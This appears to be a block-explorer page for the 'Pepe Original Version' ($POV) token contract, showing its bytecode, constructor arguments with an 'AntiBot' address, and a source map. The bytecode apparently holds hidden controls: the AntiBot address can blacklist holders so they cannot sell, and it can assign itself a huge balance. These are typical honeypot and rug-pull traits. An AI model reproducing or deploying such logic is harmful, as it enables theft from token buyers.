64207a65726f60d81b60648201526084015b60405180910390fd5b61038c82868684036105ce565b60003361036781858561076c565b600354336001600160a01b0390911603610414576001600160a01b03166000908152600760205260409020805460ff19169055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61050d6109c2565b6001600160a01b0381166105725760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610481565b61041481610a1c565b6003546001600160a01b0316336001600160a01b03161461059857565b600354336001600160a01b03909116036103cb573360009081526001602052604090206d53dda36df3e426f0d57b400000009055565b6001600160a01b0383166106305760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610481565b6001600160a01b0382166106915760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610481565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106fe84846104da565b9050600019811461076657818110156107595760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610481565b61076684848484036105ce565b50505050565b6001600160a01b0383166107d05760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610481565b6001600160a01b0382166108325760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610481565b6001600160a01b03831660009081526001602090815260408083205460079092529091205460ff161561088d5761088a61086b60045490565b6001600160a01b03861660009081526001602052604090205490610a6c565b90505b818110156108ec5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610481565b6108f68183610a6c565b6001600160a01b03851660009081526001602052604081209190915560085461092d90606490610927908690610a7f565b90610a8b565b6001600160a01b03851660009081526001602052604090205490915061095f9082906109599086610a97565b90610a6c565b6001600160a01b0380861660008181526001602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109b39087815260200190565b60405180910390a35050505050565b6000546001600160a01b031633146103cb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610481565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610a788284610c24565b9392505050565b6000610a788284610c37565b6000610a788284610c4e565b6000610a788284610c11565b600060208083528351808285015260005b81811015610ad057858101830151858201604001528201610ab4565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b0857600080fd5b919050565b60008060408385031215610b2057600080fd5b610b2983610af1565b946020939093013593505050565b600060208284031215610b4957600080fd5b610a7882610af1565b600080600060608486031215610b6757600080fd5b610b7084610af1565b9250610b7e60208501610af1565b9150604084013590509250925092565b60008060408385031215610ba157600080fd5b610baa83610af1565b9150610bb860208401610af1565b90509250929050565b600181811c90821680610bd557607f821691505b602082108103610bf557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561036d5761036d610bfb565b8181038181111561036d5761036d610bfb565b808202811582820484141761036d5761036d610bfb565b600082610c6b57634e487b7160e01b600052601260045260246000fd5b50049056fea264697066735822122064060c97df90805fdb6035eb70bb5281252f27feaac0aee195f3e058e151167364736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e11830006fe3d3a03e3e92f9494be9211753ac89000000000000000000000000000000000000000000000000000000000000001550657065204f726967696e616c2056657273696f6e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000424504f5600000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Pepe Original Version
Arg [1] : symbol_ (string): $POV
Arg [2] : AntiBot (address): 0xE11830006fe3D3A03e3e92F9494Be9211753aC89

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000e11830006fe3d3a03e3e92f9494be9211753ac89
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000015
Arg [4] : 50657065204f726967696e616c2056657273696f6e0000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [6] : 24504f5600000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

9444:11015:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11125:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13428:193;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;13428:193:0;1004:187:1;10133:104:0;;;;;;:::i;:::-;-1:-1:-1;;;;;10215:14:0;10190:4;10215:14;;;:9;:14;;;;;;;;;10133:104;12225:102;12305:14;;12225:102;;;1533:25:1;;;1521:2;1506:18;12225:102:0;1387:177:1;14201:287:0;;;;;;:::i;:::-;;:::i;12075:85::-;;;12150:2;2044:36:1;;2032:2;2017:18;12075:85:0;1902:184:1;14897:238:0;;;;;;:::i;:::-;;:::i;12390:119::-;;;;;;:::i;:::-;-1:-1:-1;;;;;12483:18:0;12456:7;12483:18;;;:9;:18;;;;;;;12390:119;8623:103;;;:::i;:::-;;7973:87;8019:7;8046:6;-1:-1:-1;;;;;8046:6:0;7973:87;;;-1:-1:-1;;;;;2255:32:1;;;2237:51;;2225:2;2210:18;7973:87:0;2091:203:1;11338:98:0;;;:::i;9984:141::-;;;;;;:::i;:::-;;:::i;15638:424::-;;;;;;:::i;:::-;;:::i;12717:185::-;;;;;;:::i;:::-;;:::i;9830:146::-;;;;;;:::i;:::-;;:::i;9644:29::-;;;;;-1:-1:-1;;;;;9644:29:0;;;12965:143;;;;;;:::i;:::-;;:::i;8881:201::-;;;;;;:::i;:::-;;:::i;10245:258::-;;;:::i;11125:94::-;11171:13;11204:7;11197:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11125:94;:::o;13428:193::-;13503:4;6848:10;13559:32;6848:10;13575:7;13584:6;13559:8;:32::i;:::-;13609:4;13602:11;;;13428:193;;;;;:::o;14201:287::-;14324:4;6848:10;14382:38;14398:4;6848:10;14413:6;14382:15;:38::i;:::-;14431:27;14441:4;14447:2;14451:6;14431:9;:27::i;:::-;-1:-1:-1;14476:4:0;;14201:287;-1:-1:-1;;;;14201:287:0:o;14897:238::-;14985:4;6848:10;15041:64;6848:10;15057:7;15094:10;15066:25;6848:10;15057:7;15066:9;:25::i;:::-;:38;;;;:::i;:::-;15041:8;:64::i;8623:103::-;7857:15;:13;:15::i;:::-;8688:30:::1;8715:1;8688:18;:30::i;:::-;8623:103::o:0;11338:98::-;11386:13;11419:9;11412:16;;;;;:::i;9984:141::-;10040:13;;6848:10;-1:-1:-1;;;;;10040:13:0;;;:29;10036:82;;-1:-1:-1;;;;;10085:14:0;;;;;;:9;:14;;;;;:21;;-1:-1:-1;;10085:21:0;10102:4;10085:21;;;10036:82;9984:141;:::o;15638:424::-;15731:4;6848:10;15731:4;15814:25;6848:10;15831:7;15814:9;:25::i;:::-;15787:52;;15878:15;15858:16;:35;;15850:85;;;;-1:-1:-1;;;15850:85:0;;3413:2:1;15850:85:0;;;3395:21:1;3452:2;3432:18;;;3425:30;3491:34;3471:18;;;3464:62;-1:-1:-1;;;3542:18:1;;;3535:35;3587:19;;15850:85:0;;;;;;;;;15963:60;15972:5;15979:7;16007:15;15988:16;:34;15963:8;:60::i;12717:185::-;12788:4;6848:10;12844:28;6848:10;12861:2;12865:6;12844:9;:28::i;9830:146::-;9890:13;;6848:10;-1:-1:-1;;;;;9890:13:0;;;:29;9886:83;;-1:-1:-1;;;;;9935:14:0;9952:5;9935:14;;;:9;:14;;;;;:22;;-1:-1:-1;;9935:22:0;;;9830:146::o;12965:143::-;-1:-1:-1;;;;;13073:18:0;;;13046:7;13073:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;12965:143::o;8881:201::-;7857:15;:13;:15::i;:::-;-1:-1:-1;;;;;8970:22:0;::::1;8962:73;;;::::0;-1:-1:-1;;;8962:73:0;;3819:2:1;8962:73:0::1;::::0;::::1;3801:21:1::0;3858:2;3838:18;;;3831:30;3897:34;3877:18;;;3870:62;-1:-1:-1;;;3948:18:1;;;3941:36;3994:19;;8962:73:0::1;3617:402:1::0;8962:73:0::1;9046:28;9065:8;9046:18;:28::i;10245:258::-:0;10305:13;;-1:-1:-1;;;;;10305:13:0;6848:10;-1:-1:-1;;;;;10289:29:0;;10285:68;;10245:258::o;10285:68::-;10367:13;;6848:10;-1:-1:-1;;;;;10367:13:0;;;:29;10363:133;;6848:10;10412:23;;;;:9;:23;;;;;10438:46;10412:72;;10245:258::o;19344:380::-;-1:-1:-1;;;;;19480:19:0;;19472:68;;;;-1:-1:-1;;;19472:68:0;;4226:2:1;19472:68:0;;;4208:21:1;4265:2;4245:18;;;4238:30;4304:34;4284:18;;;4277:62;-1:-1:-1;;;4355:18:1;;;4348:34;4399:19;;19472:68:0;4024:400:1;19472:68:0;-1:-1:-1;;;;;19559:21:0;;19551:68;;;;-1:-1:-1;;;19551:68:0;;4631:2:1;19551:68:0;;;4613:21:1;4670:2;4650:18;;;4643:30;4709:34;4689:18;;;4682:62;-1:-1:-1;;;4760:18:1;;;4753:32;4802:19;;19551:68:0;4429:398:1;19551:68:0;-1:-1:-1;;;;;19632:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19684:32;;1533:25:1;;;19684:32:0;;1506:18:1;19684:32:0;;;;;;;19344:380;;;:::o;20015:441::-;20150:24;20177:25;20187:5;20194:7;20177:9;:25::i;:::-;20150:52;;-1:-1:-1;;20217:16:0;:37;20213:236;;20299:6;20279:16;:26;;20271:68;;;;-1:-1:-1;;;20271:68:0;;5034:2:1;20271:68:0;;;5016:21:1;5073:2;5053:18;;;5046:30;5112:31;5092:18;;;5085:59;5161:18;;20271:68:0;4832:353:1;20271:68:0;20375:51;20384:5;20391:7;20419:6;20400:16;:25;20375:8;:51::i;:::-;20139:317;20015:441;;;:::o;16559:758::-;-1:-1:-1;;;;;16696:24:0;;16688:74;;;;-1:-1:-1;;;16688:74:0;;5392:2:1;16688:74:0;;;5374:21:1;5431:2;5411:18;;;5404:30;5470:34;5450:18;;;5443:62;-1:-1:-1;;;5521:18:1;;;5514:35;5566:19;;16688:74:0;5190:401:1;16688:74:0;-1:-1:-1;;;;;16781:16:0;;16773:64;;;;-1:-1:-1;;;16773:64:0;;5798:2:1;16773:64:0;;;5780:21:1;5837:2;5817:18;;;5810:30;5876:34;5856:18;;;5849:62;-1:-1:-1;;;5927:18:1;;;5920:33;5970:19;;16773:64:0;5596:399:1;16773:64:0;-1:-1:-1;;;;;16865:21:0;;16848:15;16865:21;;;:9;:21;;;;;;;;;16901:9;:21;;;;;;;;;:30;16897:112;;16957:40;16983:13;12305:14;;;12225:102;16983:13;-1:-1:-1;;;;;16957:21:0;;;;;;:9;:21;;;;;;;:25;:40::i;:::-;16948:49;;16897:112;17040:6;17029:7;:17;;17021:68;;;;-1:-1:-1;;;17021:68:0;;6202:2:1;17021:68:0;;;6184:21:1;6241:2;6221:18;;;6214:30;6280:34;6260:18;;;6253:62;-1:-1:-1;;;6331:18:1;;;6324:36;6377:19;;17021:68:0;6000:402:1;17021:68:0;17124:19;:7;17136:6;17124:11;:19::i;:::-;-1:-1:-1;;;;;17100:21:0;;;;;;:9;:21;;;;;:43;;;;17181:6;;17170:27;;17193:3;;17170:18;;:6;;:10;:18::i;:::-;:22;;:27::i;:::-;-1:-1:-1;;;;;17225:13:0;;;;;;:9;:13;;;;;;17154:43;;-1:-1:-1;17225:36:0;;17154:43;;17225:25;;17243:6;17225:17;:25::i;:::-;:29;;:36::i;:::-;-1:-1:-1;;;;;17208:13:0;;;;;;;:9;:13;;;;;;;:53;;;;17277:32;;;;;;;;;;17302:6;1533:25:1;;1521:2;1506:18;;1387:177;17277:32:0;;;;;;;;16677:640;;16559:758;;;:::o;8138:134::-;8019:7;8046:6;-1:-1:-1;;;;;8046:6:0;6848:10;8204:23;8196:68;;;;-1:-1:-1;;;8196:68:0;;6609:2:1;8196:68:0;;;6591:21:1;;;6628:18;;;6621:30;6687:34;6667:18;;;6660:62;6739:18;;8196:68:0;6407:356:1;9242:191:0;9316:16;9335:6;;-1:-1:-1;;;;;9352:17:0;;;-1:-1:-1;;;;;;9352:17:0;;;;;;9385:40;;9335:6;;;;;;;9385:40;;9316:16;9385:40;9305:128;9242:191;:::o;2964:98::-;3022:7;3049:5;3053:1;3049;:5;:::i;:::-;3042:12;2964:98;-1:-1:-1;;;2964:98:0:o;3321:::-;3379:7;3406:5;3410:1;3406;:5;:::i;3720:98::-;3778:7;3805:5;3809:1;3805;:5;:::i;2583:98::-;2641:7;2668:5;2672:1;2668;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1196:186::-;1255:6;1308:2;1296:9;1287:7;1283:23;1279:32;1276:52;;;1324:1;1321;1314:12;1276:52;1347:29;1366:9;1347:29;:::i;1569:328::-;1646:6;1654;1662;1715:2;1703:9;1694:7;1690:23;1686:32;1683:52;;;1731:1;1728;1721:12;1683:52;1754:29;1773:9;1754:29;:::i;:::-;1744:39;;1802:38;1836:2;1825:9;1821:18;1802:38;:::i;:::-;1792:48;;1887:2;1876:9;1872:18;1859:32;1849:42;;1569:328;;;;;:::o;2299:260::-;2367:6;2375;2428:2;2416:9;2407:7;2403:23;2399:32;2396:52;;;2444:1;2441;2434:12;2396:52;2467:29;2486:9;2467:29;:::i;:::-;2457:39;;2515:38;2549:2;2538:9;2534:18;2515:38;:::i;:::-;2505:48;;2299:260;;;;;:::o;2564:380::-;2643:1;2639:12;;;;2686;;;2707:61;;2761:4;2753:6;2749:17;2739:27;;2707:61;2814:2;2806:6;2803:14;2783:18;2780:38;2777:161;;2860:10;2855:3;2851:20;2848:1;2841:31;2895:4;2892:1;2885:15;2923:4;2920:1;2913:15;2777:161;;2564:380;;;:::o;2949:127::-;3010:10;3005:3;3001:20;2998:1;2991:31;3041:4;3038:1;3031:15;3065:4;3062:1;3055:15;3081:125;3146:9;;;3167:10;;;3164:36;;;3180:18;;:::i;6768:128::-;6835:9;;;6856:11;;;6853:37;;;6870:18;;:::i;6901:168::-;6974:9;;;7005;;7022:15;;;7016:22;;7002:37;6992:71;;7043:18;;:::i;7074:217::-;7114:1;7140;7130:132;;7184:10;7179:3;7175:20;7172:1;7165:31;7219:4;7216:1;7209:15;7247:4;7244:1;7237:15;7130:132;-1:-1:-1;7276:9:1;;7074:217::o

Swarm Source

ipfs://64060c97df90805fdb6035eb70bb5281252f27feaac0aee195f3e058e1511673
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.